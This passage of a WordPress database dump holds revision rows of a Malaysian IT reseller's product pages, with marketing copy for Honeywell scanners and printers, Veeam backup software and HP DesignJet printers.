designed to improve the productivity of mobile workers.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2050 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div style=\"text-align: center;\"><strong>Printers and MediaÂ </strong></div>\r\n<div style=\"text-align: center;\">Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2052 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div style=\"text-align: center;\"><strong>Wearable Devices</strong></div>\r\n<div style=\"text-align: center;\">Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeyw','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 20:58:56','2018-12-13 12:58:56','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2064,1,'2018-12-13 21:02:15','2018-12-13 13:02:15','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"size-full wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"250\" height=\"250\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeyw','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 21:02:15','2018-12-13 13:02:15','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2062,1,'2018-12-13 20:59:34','2018-12-13 12:59:34','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"size-full wp-image-2051 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"250\" height=\"250\" />\r\n<div style=\"text-align: center;\"><strong>Scanning</strong></div>\r\n<div class=\"score-highlight-body\" style=\"text-align: center;\">From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</div>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2049 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div style=\"text-align: center;\"><strong>Computer Device</strong></div>\r\n<div style=\"text-align: center;\">Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</div>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2050 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div style=\"text-align: center;\"><strong>Printers and MediaÂ </strong></div>\r\n<div style=\"text-align: center;\">Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</div>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2052 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div style=\"text-align: center;\"><strong>Wearable Devices</strong></div>\r\n<div style=\"text-align: center;\">Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</div>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeyw','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 20:59:34','2018-12-13 12:59:34','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2063,1,'2018-12-13 21:01:00','2018-12-13 13:01:00','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"size-full wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"250\" height=\"250\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning</strong></li>\r\n</ul>\r\n<div class=\"score-highlight-body\" style=\"text-align: left;\">From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</div>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device</strong></li>\r\n</ul>\r\n<div style=\"text-align: left;\">Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</div>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ </strong></li>\r\n</ul>\r\n<div style=\"text-align: left;\">Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</div>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices</strong></li>\r\n</ul>\r\n<div style=\"text-align: left;\">Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</div>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeyw','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 21:01:00','2018-12-13 13:01:00','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2065,1,'2018-12-13 21:02:44','2018-12-13 13:02:44','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\" wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeyw','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 21:02:44','2018-12-13 13:02:44','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2066,1,'2018-12-13 21:11:22','2018-12-13 13:11:22','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\" wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"179\" height=\"179\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeyw','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 21:11:22','2018-12-13 13:11:22','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2067,1,'2018-12-13 21:11:45','2018-12-13 13:11:45','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\" wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"179\" height=\"179\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 21:11:45','2018-12-13 13:11:45','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2069,1,'2018-12-13 21:15:21','2018-12-13 13:15:21','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"wp-image-2051 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 21:15:21','2018-12-13 13:15:21','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2070,1,'2018-12-13 21:15:36','2018-12-13 13:15:36','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"wp-image-2051 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: center;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 21:15:36','2018-12-13 13:15:36','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2071,1,'2018-12-13 21:16:01','2018-12-13 13:16:01','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 21:16:01','2018-12-13 13:16:01','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2075,1,'2018-12-13 21:40:10','2018-12-13 13:40:10','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 21:40:10','2018-12-13 13:40:10','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2077,1,'2018-12-13 21:53:30','2018-12-13 13:53:30','<h3>Veeam</h3>\r\n<h3><span class=\"veeam-text__text-largest\">Expanding leadership inÂ CloudÂ Data Management</span></h3>\r\n<div class=\"section-title-component aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--phone--0 aem-GridColumn--tablet--6 aem-GridColumn--offset--default--0\">\r\n<div class=\"section-title section-title--alignment-left section-title--only-title veeam-component__component-spacing-below--md\">\r\n<div class=\"section-title__title-block\">\r\n<h4 class=\"section-title__title section-title__title--gray\">Hyper-Availability is mission-critical for todayâ€™s business</h4>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div class=\"veeam-text \">There\'s a new expectation of today\'s data â€” that it moves to a new state of intelligence, able to automatically anticipateÂ needÂ and meet demand, and move securely across multi-cloud infrastructures. Resulting in the insights you need to speed up the pace of innovation and deliver new digital services and experiences.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div></div>\r\n</div>\r\n<div>\r\n<h4>Availability solutions that fit your business needs and budget</h4>\r\n<h4><strong>Small Business</strong></h4>\r\n<strong>Veeam Backup Essentials</strong>\r\n<ul>\r\n 	<li>Manage the ever-increasing backup complexity of your small business (250 employees or less)</li>\r\n 	<li>Save up to 60% for the same enterprise-level functionality and scalability</li>\r\n 	<li>Get Hyper-Availability for ALL of your workloads â€” virtual, physical and cloud</li>\r\n</ul>\r\n<h4><strong>Medium Enterprise</strong></h4>\r\n<strong>Veeam Backup &amp; Replication</strong>\r\n<ul>\r\n 	<li>Manage ALL virtual, physical, and cloud-based workloads from a single console</li>\r\n 	<li>Restore entire VMs, individual files and everything in between</li>\r\n 	<li>View and recover application items from backups or replicas without needing to restore the whole a virtual machine</li>\r\n</ul>\r\n<h4><strong>Large Enterprise</strong></h4>\r\n<strong>Veeam Availability Suite</strong>\r\n<ul>\r\n 	<li>Take control of your entire virtual, physical and cloud backup environment</li>\r\n 	<li>Achieve disaster recovery of any IT service and related applications and data within seconds and minutes</li>\r\n 	<li>Respond proactively to potential problems with real-time monitoring, reports and alerts</li>\r\n</ul>\r\n</div>\r\n</div>\r\n[maxbutton id=\"1\" ]','Veeam','','inherit','closed','closed','','1608-revision-v1','','','2018-12-13 21:53:30','2018-12-13 13:53:30','',1608,'https://bintara.com.my/blog/2018/12/13/1608-revision-v1/',0,'revision','',0),(2085,1,'2018-12-13 22:18:19','2018-12-13 14:18:19','<h3 class=\"font-lh3 \">HP DesignJet large-format office printers</h3>\r\n<div class=\"description\">These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T120 Printer</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T120_Gallery_image1_941x500_tcm245_2364857_tcm245_2372015_tcm245-2364857.jpg\" alt=\"HP DesignJet T120 Printer with architectural drawing output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">The most affordable and compact HP DesignJet printer</h3>\r\n<div class=\"description\">The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.</div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T1700 Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T1700_Gallery_image1_941x500_tcm245_2540802_tcm245_2540822_tcm245-2540802.jpg\" alt=\"Right-facing view of HP DesignJet T1700 with colorful map output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Secure, empowering printer for CAD/GIS workgroups</h3>\r\n<div class=\"description\">Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T830 Multifunction Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T830_Gallery_image1_941x500_tcm245_2380328_tcm245_2380348_tcm245-2380328.jpg\" alt=\"HP DesignJet T830 Printer with colorful city view output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Smart choice for evolving architect/construction offices</h3>\r\n<div class=\"description\">Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print/scan/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div></div>\r\n<div>To discover more, please click the buttons below or contact us to discuss your needs.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>\r\n</div>','HP','','inherit','closed','closed','','1528-revision-v1','','','2018-12-13 22:18:19','2018-12-13 14:18:19','',1528,'https://bintara.com.my/blog/2018/12/13/1528-revision-v1/',0,'revision','',0),(2084,1,'2018-12-13 22:16:32','2018-12-13 14:16:32','<h3 class=\"font-lh3 \">HP DesignJet large-format office printers</h3>\r\n<div class=\"description\">These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while 